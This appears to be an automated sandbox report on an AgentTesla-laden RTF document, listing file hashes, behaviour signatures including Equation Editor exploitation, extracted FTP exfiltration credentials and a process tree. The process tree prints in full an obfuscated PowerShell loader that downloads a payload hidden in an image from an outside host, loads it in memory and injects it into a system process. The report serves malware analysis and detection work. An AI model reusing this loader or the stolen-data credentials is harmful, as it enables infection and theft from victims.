Overview

overview

10

Static

static

1

Unconfirme...08.rtf

windows7-x64

10

Unconfirme...08.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25-04-2024 11:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Unconfirmed 977108.rtf

  • Size

    69KB

  • MD5

    bd7a9eba72d2a2a8cc97260ec906b842

  • SHA1

    ecf9f969b5f2b687aaf73c6173807cdaad151adb

  • SHA256

    6dd61f18a3cd350daf98d26c0ce32c935fae9a5458ee6e0d8f9fa843be227e02

  • SHA512

    8eb5705bba4a86df8b08d3c9b7db67fa382541469905e3196c5d95f02ab77da5bfc60ba2316ae3c9102190bbf8bf09fd642889916a68c4d0452f4f911177ee69

  • SSDEEP

    1536:7LPx4QfgceatqBb1NTaYIjlQYYmatL6ZDngEaSa7XYtHoylWg3HK:7LZ4QoTatqBb1NTaYIRjyL6ZbhaSarYy

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    =A+N^@~c]~#I

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 977108.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2280
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2372
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2696
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1844

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      3a3f9c63387d65adc2c5a0895fea6359

      SHA1

      4eb991c3c16c91752cc1ce174de8197187bf9e83

      SHA256

      38f3e502e85580a50040d3d7908ca5e401f39ec7738bee3be68b7218b36506e1

      SHA512

      3e74b7fb8a476ea20375cc08484e3dcbad8921d0022d0474a05a312a7aa741cfca043b607f9fd00dd5ceeecf22406740a772ef6014ed081fe5a7949e83d16bc1

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6c235629bbb06e61f7891429f6c850fa

      SHA1

      bfa3a268278621fb939b744b015d824e4d76fec2

      SHA256

      734e049b51e78c915263aa9fb943ad8210275ecc78033b4de7ee80d2d4ee6f33

      SHA512

      73311dde6ccfc328a2e6699f41c09724ff5fbc65de7fb258a8b3b407dbf8cc388ff10278b2550c56c14963e7aca6e975998fbff7ae5ac6e29122b07d3566e011

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\CabBD08.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\TarBD78.tmp
      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\TarBED6.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      1b07c0ee480c0098aa322cb3e28c42b3

      SHA1

      391b5b5f85558a5d9f2cb74379ce458cc3ef5fda

      SHA256

      8caefd38f21200aaa8cf063b38005e2b59e5100bf20b1517939de9aa0e445165

      SHA512

      bc5507fd886c3dccc4350184b2a5ff245cc879a3e6dbb8ebfbe8c5808e62d58c6d1da75d37b31ee1b003d8090c8d79e7c2f5397ce7d7cab9c3835b0e0266c911

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      2e03e01dea5c87e3d4ec24121e12aa42

      SHA1

      7e8e62024a443743ca4fc951ab42cdc1abc7f4ff

      SHA256

      0a1bd6150c7943ad4addc2b3ac214a92f034b54ecec6d2eac73c5ecdf10b1f67

      SHA512

      f2072545b577db272f65a016437e1858e46f2fdf65c97cd6d159b137f5623425669dfa9d9293a83eecd39db194b2ff3e6b61d42ea00651f0a0571f5e9080d25d

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js
      Filesize

      5KB

      MD5

      ac0d326c138bf899aee07f61650876ee

      SHA1

      ee943015e8812841cac37f7612f0faf718eb7cc4

      SHA256

      b0e344c282bfc88a1b0690186bbd8f7c0901efbedb8aa56a8bfc2091bbd5b906

      SHA512

      882336e84f9119777e05ef3c221cdcd2271db763e0aab200cc6573b895ff83c5c2182042dd382725638ec655a58feadfb79985d06324e746c8769be230596d86

      Download Submit
    • memory/884-35-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/884-130-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/884-129-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/884-128-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/884-131-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/884-38-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/884-37-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/884-36-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/884-151-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1844-143-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1844-141-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-155-0x00000000048F0000-0x0000000004930000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1844-154-0x00000000667F0000-0x0000000066EDE000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1844-153-0x00000000048F0000-0x0000000004930000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1844-152-0x00000000667F0000-0x0000000066EDE000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1844-149-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-147-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-145-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-142-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-136-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/1844-138-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

      Download
    • memory/2696-133-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2696-150-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2696-135-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2696-47-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2696-134-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2696-46-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2696-132-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2696-140-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2696-45-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2696-44-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2896-2-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2896-126-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2896-0-0x000000002F421000-0x000000002F422000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2896-173-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2896-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2896-174-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB

      Download